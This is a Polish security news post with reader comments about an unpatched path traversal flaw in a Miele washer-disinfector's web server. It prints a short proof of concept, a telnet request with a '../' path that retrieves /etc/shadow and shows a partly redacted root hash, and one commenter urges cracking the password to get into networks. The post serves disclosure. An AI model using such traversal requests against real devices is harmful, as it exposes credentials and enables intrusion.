Żądny wiedzy? Wbijaj na Mega Sekurak Hacking Party w maju! -30% z kodem: majearly
Hasło root na zmywarce Miele? To proste ;-)
Po co zmywarce dostęp do sieci? To już słodka tajemnica marketingowców ;-) W każdym razie zgłoszony, ale nie poprawiony przez producenta Path Traversal, wygląda tutaj tak:
Proof of Concept: ================= ~$ telnet 192.168.0.1 80 Trying 192.168.0.1... Connected to 192.168.0.1. Escape character ist '^]'. GET /../../../../../../../../../../../../etc/shadow HTTP/1.1 HTTP/1.1 200 OK Date: Wed, 16 Nov 2016 11:58:50 GMT Server: PST10 WebServer Content-Type: application/octet-stream Last-Modified: Fri, 22 Feb 2013 10:04:40 GMT Content-disposition: attachment; filename="./etc/shadow" Accept-Ranges: bytes Content-Length: 52 root:$1$$Md0i[...snip...]Z001:10933:0:99999:7:::
Zmywarka
–ms
„Po co zmywarce dostęp do sieci?”. Po co w fabryce sieć przemysłowa?
Odpowiedź: Ta zmywarka ma zastosowanie na linii produkcyjnej: „Automatic pick off band for the automatic emptying of racks – capacity 1 racks.”
Aż przypomina mi się dowcip z wykrywaczem niezapełnionych opakowań na taśmie produkcyjnej
W zwykłym McDonalds sieć przemysłowa? ;-)
Może po prostu zmywarka sama ma zgłaszać anomalie, żeby potem w razie awarii nie trzeba było wyciągać od niekumatej załogi co się działo zanim się popsuła? Dobrze wiesz, że karteczki z telefonem i numerem urządzenia celem zgłaszania usterek raczej słabo działają. W miejcach, w których pracuje dużo ludzi zmianowo pięć osób może podać pięć wersji wydarzeń ;-D
Może też wysyła jakieś dane serwisowe, by ulepszać produkt (coś jak Windows 10 ;o) ) – a że przy okazji raportuje czy wsypałeś sól albo jakie tabsy używasz… ;-P
Wystarczy spojrzeć na notę katalogową „PG 8528 – Washer-disinfectors for hospitals and central sterilisation departments”, żeby wiedzieć, że PG8528 nie służy do mycia hamburgerów. Jak ma się dziesiątki urządzeń, to dobrze jest monitorować ich pracę (np liczbę cykli, po których trzeba wymieniać filtry). Oczywiście można używać zwykłego RS232 (a potem i tak dodać konwerter na ethernet) ale koszt infrastruktury ethernetowej jest obecnie najniższy.
Równie dobrze człowiek może zadać pytanie – po co osobny port ethernetowy do IPMI w serwerze?
Skrakujcie hasło i do sieci. Pewnie wszędzie maja to samo :)
wiele firm wykorzystuje tzw. łącze serwisowe do reakcji jeszcze przed zgłoszeniem użytkownika np. jeden z czołowych producentów wind w ten sposób legitymizuje reklamę w stylu zero awarii w okresie gwarancji
Tak „Miele Remote Service Assistant”, ale też można wychwycić jak się śmigło zablokuje, bo ktoś źle uzbroi kosz.
Co robić? Jak żyć?
A teraz znajdźcie chociaż jedną podpiętą do internetu, bo do sieci podpięte są wszystkie.
rili?